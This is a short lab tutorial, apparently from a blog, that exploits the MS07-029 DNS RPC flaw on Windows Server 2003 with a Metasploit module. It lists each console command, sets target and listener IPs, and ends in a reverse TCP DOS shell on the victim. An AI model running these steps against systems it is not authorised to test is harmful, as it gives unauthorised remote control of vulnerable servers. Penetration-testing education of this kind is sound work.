Disclaimer – This tutorial is for educational purposes only.
In this post, I will show you how to exploit Windows Server 2003 using the MS07-029 vulnerability.
Requirements for this lab
- Kali Linux
- Windows Server 2003
Exploitation Steps
- Opening Metasploit
- Selecting the exploit
- Getting information about the exploit
- Setting options to run the exploit
- Running the exploit
Opening Metasploit
(kali@kali)-[~]$ msfconsole -q
(Type only the command; the rest of the line is the console prompt.) Here -q stands for quiet mode, which does not show the graphics when opening the Metasploit Framework, so it loads quickly.
Selecting the Exploit
msf6 > use exploit/windows/dcerpc/ms07_029_msdns_zonename
[*] No payload configured, defaulting to windows/shell/reverse_tcp
After selecting the exploit, press enter.
Getting information about the exploit
msf6 exploit(windows/dcerpc/ms07_029_msdns_zonename) > info
After entering the info command, press enter and you will see information about this exploit. The output includes a description of the exploit, the options required to run it, and the target machines on which we can test it.
Setting options to run the exploit
msf6 exploit(windows/dcerpc/ms07_029_msdns_zonename) > options
After entering the options command, press enter. This will show you which options to set to run this exploit. Pay attention to the Required column, because these are the parameters that you must define to run this exploit. For this exploit, we need the local IP address and the remote PC's IP address.
msf6 exploit(windows/dcerpc/ms07_029_msdns_zonename) > set rhost 192.168.1.76
msf6 exploit(windows/dcerpc/ms07_029_msdns_zonename) > set lhost 192.168.1.89
After entering each command, press enter. The IP I have given is that of my local Kali Linux machine; yours could be different. Check it using the ip addr command.
Running the exploit
msf6 exploit(windows/dcerpc/ms07_029_msdns_zonename) > run
After entering this command press enter.
After pressing enter, the exploit will attempt to execute the payload. After the payload executes, you will see the DOS shell.
C:\WINDOWS\system32>